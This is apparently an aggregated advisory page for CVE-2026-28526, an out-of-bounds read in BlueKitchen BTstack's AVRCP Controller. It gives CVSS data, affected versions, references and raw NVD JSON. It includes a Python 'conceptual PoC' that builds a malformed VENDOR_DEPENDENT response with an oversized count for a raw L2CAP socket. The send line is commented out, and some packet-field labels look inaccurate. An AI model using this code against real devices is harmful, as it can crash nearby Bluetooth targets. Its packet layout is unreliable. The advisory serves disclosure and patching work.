CVE-2026-28526

Description

BlueKitchen BTstack versions prior to 1.8.1 contain an out-of-bounds read vulnerability in the AVRCP Controller LIST_PLAYER_APPLICATION_SETTING_ATTRIBUTES and LIST_PLAYER_APPLICATION_SETTING_VALUES handlers that allows attackers to read beyond buffer boundaries. A nearby attacker with a paired Bluetooth Classic connection can send a specially crafted VENDOR_DEPENDENT response with an attacker-controlled count value to trigger an out-of-bounds read from the L2CAP receive buffer, potentially causing a crash on resource-constrained devices.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:bluekitchen-gmbh:btstack:*:*:*:*:*:*:*:* - VULNERABLE

BlueKitchen BTstack < 1.8.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import struct

# This is a conceptual PoC for sending a malicious AVRCP VENDOR_DEPENDENT response.
# It requires a paired Bluetooth connection and raw L2CAP socket access.

def send_malicious_avrcp_response(target_bt_mac, psm):
    # Create a raw Bluetooth L2CAP socket
    # Note: This typically requires root privileges and specific hardware support
    sock = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_L2CAP)
    
    target_addr = (target_bt_mac, psm)
    
    # Construct the malicious VENDOR_DEPENDENT response
    # The vulnerability lies in the 'count' field being too large
    transaction_label = 0x01
    pdu_id = 0x10  # Example PDU ID for VENDOR_DEPENDENT
    c_type = 0x00 # Response
    company_id = 0x00001958 # Example Company ID (might vary)
    
    # Malicious payload: count value is set to 0xFFFF to trigger OOB read
    # Structure: [Header] [Company ID] [Count] ...
    malicious_count = 0xFFFF 
    
    # Assemble the packet (Simplified structure)
    # Real implementation requires correct AVRCP framing over L2CAP
    header = struct.pack("BBBB", transaction_label, pdu_id, c_type, 0x00)
    company_id_bytes = struct.pack("<I", company_id)
    payload = struct.pack("<H", malicious_count) + b"A" * 10 # Padding
    
    # In a real exploit, this payload would be encapsulated in L2CAP
    # and sent to the target's PSM for AVRCP Control.
    
    print(f"[+] Sending malicious packet to {target_bt_mac} on PSM {psm}")
    print(f"[+] Malicious count value: {malicious_count}")
    
    # sock.sendto(header + company_id_bytes + payload, target_addr)
    # sock.close()

if __name__ == "__main__":
    # Replace with actual target MAC and PSM
    TARGET_MAC = "00:11:22:33:44:55"
    AVRCP_CONTROL_PSM = 0x17 # Default AVRCP control PSM
    send_malicious_avrcp_response(TARGET_MAC, AVRCP_CONTROL_PSM)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-28526
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-28526
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-28526/
[4] VulDB https://vuldb.com/cve/CVE-2026-28526
[5] https://github.com/bluekitchen/btstack/releases/tag/v1.8.1
[6] https://www.vulncheck.com/advisories/bluekitchen-btstack-avrcp-controller-list-player-application-setting-handlers-oob-read

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-28526", "sourceIdentifier": "[email protected]", "published": "2026-03-30T14:16:34.750", "lastModified": "2026-04-03T15:58:18.837", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "BlueKitchen BTstack versions prior to 1.8.1 contain an out-of-bounds read vulnerability in the AVRCP Controller LIST_PLAYER_APPLICATION_SETTING_ATTRIBUTES and LIST_PLAYER_APPLICATION_SETTING_VALUES handlers that allows attackers to read beyond buffer boundaries. A nearby attacker with a paired Bluetooth Classic connection can send a specially crafted VENDOR_DEPENDENT response with an attacker-controlled count value to trigger an out-of-bounds read from the L2CAP receive buffer, potentially causing a crash on resource-constrained devices."}, {"lang": "es", "value": "Las versiones de BlueKitchen BTstack anteriores a la 1.8.1 contienen una vulnerabilidad de lectura fuera de límites en los manejadores LIST_PLAYER_APPLICATION_SETTING_ATTRIBUTES y LIST_PLAYER_APPLICATION_SETTING_VALUES del controlador AVRCP que permite a los atacantes leer más allá de los límites del búfer. Un atacante cercano con una conexión Bluetooth Classic emparejada puede enviar una respuesta VENDOR_DEPENDENT especialmente diseñada con un valor de conteo controlado por el atacante para activar una lectura fuera de límites desde el búfer de recepción L2CAP, lo que podría causar un fallo en dispositivos con recursos limitados."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bluekitchen-gmbh:btstack:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.8.1", "matchCriteriaId": "C2852C96-CC34-4FB3-9CB9-0048722A6617"}]}]}], "references": [{"url": "https://github.com/bluekitchen/btstack/releases/tag/v1.8.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/bluekitchen-btstack-avrcp-controller-list-player-application-setting-handlers-oob-read", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}